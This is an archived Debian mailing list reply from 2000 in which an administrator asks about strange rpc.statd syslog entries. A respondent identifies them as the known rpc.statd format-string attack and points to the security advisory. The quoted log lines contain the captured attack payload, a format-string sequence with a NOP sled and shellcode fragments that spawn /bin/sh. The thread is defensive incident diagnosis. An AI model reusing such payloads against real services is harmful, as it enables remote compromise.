Re: weird rpc.statd messages on potato

To: Damian Menscher <menscher@uiuc.edu>
Cc: debian-user@lists.debian.org, admin@namodn.com
Subject: Re: weird rpc.statd messages on potato
From: Rob <robert@namodn.com>
Date: Mon, 6 Nov 2000 20:39:53 -0800
Message-id: <[🔎] 20001106203953.D499@namodn.com>
In-reply-to: <[🔎] Pine.LNX.4.21.0011062223120.26714-100000@intellx1.physics.uiuc.edu>; from menscher@uiuc.edu on Mon, Nov 06, 2000 at 10:29:04PM -0600
References: <[🔎] 20001106201345.C499@namodn.com> <[🔎] Pine.LNX.4.21.0011062223120.26714-100000@intellx1.physics.uiuc.edu>

Hmm, well we're on nfs-utils (1:0.1.9.1-1), so would that mean
that someone is trying the exploit on us? Any way to tell where
this is coming from?

BTW, what was the exploit, some kind of overflow?

On Mon, Nov 06, 2000 at 10:29:04PM -0600, Damian Menscher wrote:
> On Mon, 6 Nov 2000, Rob wrote:
> 
> > Getting the following in our /var/log/messages
> > 
> > We use NFS between two Potato boxes, this appears on
> > both :
> > 
> > Nov  6 08:03:19 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > Nov  6 08:03:21 rudy 173>Nov  6 08:03:21 /sbin/rpc.statd[152]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ
> > Nov  6 08:03:21 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> 
> Congratulations!  Assuming you haven't patched past the default install,
> you've just been hacked!
> 
> This is a well-known attack on rpc.statd that was first publicized on
> bugtraq in mid-July (you can search the archives at
> www.securityfocus.com).  If you haven't updated your potato since then,
> you're probably a goner.  According to the page
> www.debian.org/security/2000/20000719a if you're running nfs-common
> 0.1.9.1-1 or later you should be safe.  Otherwise reinstall and apt-get
> the security updates this time.
> 
> Damian Menscher
> -- 
> --==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==--
> --==## <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==--
> --==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--
> 
>

Reply to:

Follow-Ups:
- Re: weird rpc.statd messages on potato
  - From: Damian Menscher <menscher@uiuc.edu>

References:
- weird rpc.statd messages on potato
  - From: Rob <robert@namodn.com>
- Re: weird rpc.statd messages on potato
  - From: Damian Menscher <menscher@uiuc.edu>

Prev by Date: Re: weird rpc.statd messages on potato
Next by Date: Re: MD5 Check (was Re: i am hacked atm.. what's better thing to do?)
Previous by thread: Re: weird rpc.statd messages on potato
Next by thread: Re: weird rpc.statd messages on potato
Index(es):
- Date
- Thread